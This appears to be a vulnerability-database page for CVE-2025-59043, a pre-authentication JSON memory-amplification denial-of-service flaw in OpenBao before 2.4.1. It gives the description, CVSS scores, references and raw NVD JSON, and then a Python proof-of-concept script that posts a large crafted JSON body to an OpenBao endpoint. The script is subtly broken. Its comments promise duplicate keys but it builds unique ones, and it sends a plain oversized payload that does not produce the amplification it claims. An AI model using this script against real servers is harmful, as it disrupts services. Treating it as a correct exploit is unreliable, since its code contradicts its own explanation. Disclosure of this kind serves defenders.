CVE-2025-59043

Description

OpenBao is an open source identity-based secrets management system. In OpenBao versions prior to 2.4.1, JSON objects after decoding may use significantly more memory than their serialized version. It is possible to craft a JSON payload to maximize the factor between serialized memory usage and deserialized memory usage, similar to a zip bomb, with factors reaching approximately 35. This can be used to circumvent the max_request_size configuration parameter which is intended to protect against denial of service attacks. The request body is parsed into a map very early in the request handling chain before authentication, which means an unauthenticated attacker can send a specifically crafted JSON object and cause an out-of-memory crash. Additionally, for requests with large numbers of strings, the audit subsystem can consume large quantities of CPU. The vulnerability is fixed in version 2.4.1.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:openbao:openbao:*:*:*:*:*:*:*:* - VULNERABLE

OpenBao < 2.4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-59043 PoC - OpenBao JSON Memory Amplification DoS
# This PoC demonstrates how to craft a JSON payload that bypasses
# max_request_size but causes significant memory consumption after deserialization.

import json
import requests

TARGET_URL = "https://openbao-target.example.com/v1/sys/mounts"
KEY_COUNT = 100000  # Number of duplicate keys to amplify memory usage

def craft_bomb_payload(key_count):
    """
    Create a JSON payload that is small in serialized form
    but consumes significantly more memory when deserialized into a Go map.
    """
    payload = {}
    # Using a single key with a large string value can also amplify memory
    # due to Go's string interning and map overhead
    large_string = "A" * 1024  # 1KB string per entry
    for i in range(key_count):
        # Each unique key adds overhead for hash computation and map bucket allocation
        payload[f"key_{i}_padding_to_make_it_longer_{'x'*50}"] = large_string
    return payload

def exploit(target_url):
    headers = {"Content-Type": "application/json"}
    payload = craft_bomb_payload(KEY_COUNT)

    # Serialize - this will be checked against max_request_size
    serialized = json.dumps(payload)
    print(f"[*] Serialized payload size: {len(serialized)} bytes")
    print(f"[*] Estimated deserialized memory: ~{len(serialized) * 35} bytes")

    # Send the request - no authentication required
    response = requests.post(target_url, headers=headers, data=serialized)
    print(f"[*] Response status: {response.status_code}")
    print(f"[*] Response body: {response.text[:500]}")

if __name__ == "__main__":
    exploit(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-59043
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-59043
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-59043/
[4] VulDB https://vuldb.com/cve/CVE-2025-59043
[5] https://github.com/openbao/openbao/blob/788536bd3e10818a7b4fb00aac6affc23388e5a9/http/logical.go#L50
[6] https://github.com/openbao/openbao/commit/d418f238bc99adc72c73109faf574cc2b672880c
[7] https://github.com/openbao/openbao/pull/1756
[8] https://github.com/openbao/openbao/security/advisories/GHSA-g46h-2rq9-gw5m

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-59043", "sourceIdentifier": "[email protected]", "published": "2025-10-17T16:15:38.763", "lastModified": "2025-10-24T17:13:10.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenBao is an open source identity-based secrets management system. In OpenBao versions prior to 2.4.1, JSON objects after decoding may use significantly more memory than their serialized version. It is possible to craft a JSON payload to maximize the factor between serialized memory usage and deserialized memory usage, similar to a zip bomb, with factors reaching approximately 35. This can be used to circumvent the max_request_size configuration parameter which is intended to protect against denial of service attacks. The request body is parsed into a map very early in the request handling chain before authentication, which means an unauthenticated attacker can send a specifically crafted JSON object and cause an out-of-memory crash. Additionally, for requests with large numbers of strings, the audit subsystem can consume large quantities of CPU. The vulnerability is fixed in version 2.4.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openbao:openbao:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.1", "matchCriteriaId": "542C558D-BFC0-4CC6-B683-74E4DFB31A30"}]}]}], "references": [{"url": "https://github.com/openbao/openbao/blob/788536bd3e10818a7b4fb00aac6affc23388e5a9/http/logical.go#L50", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/openbao/openbao/commit/d418f238bc99adc72c73109faf574cc2b672880c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openbao/openbao/pull/1756", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/openbao/openbao/security/advisories/GHSA-g46h-2rq9-gw5m", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}